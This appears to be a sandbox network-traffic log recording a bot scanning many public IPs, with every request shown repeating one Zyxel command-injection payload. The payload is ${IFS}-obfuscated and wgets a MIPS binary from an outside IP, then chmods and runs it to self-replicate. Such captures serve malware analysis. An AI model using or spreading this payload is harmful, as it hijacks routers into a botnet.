                                            Feb 2, 2024 06:21:13.641165018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4570192.168.2.1559090177.57.10.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641191959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4571192.168.2.153925487.126.250.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641246080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4572192.168.2.1542246181.69.205.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641273975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4573192.168.2.154074812.92.55.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641314030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4574192.168.2.1548346181.242.56.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641352892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4575192.168.2.154294297.130.102.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641391039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4576192.168.2.155279024.162.39.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641418934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4577192.168.2.153726437.25.29.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641468048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4578192.168.2.156099896.104.107.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641506910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4579192.168.2.1541086143.146.221.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641551971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4580192.168.2.1544936194.72.161.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641601086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4581192.168.2.1548990218.12.189.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641635895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4582192.168.2.1543468149.57.179.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641686916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4583192.168.2.155017879.245.158.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641717911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4584192.168.2.153747434.91.31.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641768932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4585192.168.2.155928827.14.222.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641810894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4586192.168.2.154866899.151.70.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641865969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4587192.168.2.153650854.159.124.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641899109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4588192.168.2.155236636.187.116.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641928911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4589192.168.2.1541434171.121.251.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641967058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4590192.168.2.155934248.31.227.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642019033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4591192.168.2.156066614.10.123.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642061949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4592192.168.2.153282248.52.27.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642098904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4593192.168.2.1542666157.183.156.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642155886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4594192.168.2.1553442126.169.5.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642180920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4595192.168.2.1557518131.255.178.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642214060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4596192.168.2.155411296.185.198.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642270088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4597192.168.2.1533384216.218.222.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642302990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4598192.168.2.1551842212.126.225.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642339945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4599192.168.2.154902412.191.30.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642380953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4600192.168.2.1547422204.62.205.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642402887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4601192.168.2.154845871.51.199.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642451048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4602192.168.2.1535826106.249.188.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642477036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4603192.168.2.1548812163.36.199.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642504930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4604192.168.2.1558974189.73.243.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642530918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4605192.168.2.1555826188.241.219.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642587900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4606192.168.2.155058493.252.27.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642628908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4607192.168.2.1533938141.178.75.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642678976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4608192.168.2.155908866.35.32.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642703056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4609192.168.2.1549442180.249.98.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642744064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4610192.168.2.155694660.103.146.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642784119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4611192.168.2.155277061.230.153.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642834902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4612192.168.2.155987268.242.80.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642872095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4613192.168.2.155234646.99.219.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642929077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4614192.168.2.1558948140.104.11.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642942905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4615192.168.2.154680871.96.70.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.642976999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4616192.168.2.1557514108.245.158.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.643008947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4617192.168.2.1560546179.35.216.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.643069983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4618192.168.2.154945095.187.143.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.643121958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4619192.168.2.1556944179.112.180.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.643168926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4620192.168.2.154362436.156.2.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.643202066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4621192.168.2.153450043.199.48.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.643248081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4622192.168.2.154503835.54.153.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.643269062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4623192.168.2.1539862169.18.130.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.643320084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4624192.168.2.1552964109.96.109.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.643368006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4625192.168.2.1539514168.152.237.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.643387079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4626192.168.2.1554498126.248.177.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.643410921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4627192.168.2.1551646101.31.134.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.643455982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4628192.168.2.1536426175.26.34.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.643496037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4629192.168.2.154998662.162.190.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.643532038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4630192.168.2.1559218191.194.174.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.643572092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4631192.168.2.153786096.246.31.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.643610001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4632192.168.2.1551926107.100.46.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.643640995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4633192.168.2.1540724179.164.161.130443
                                            TimestampBytes transferredDirectionData
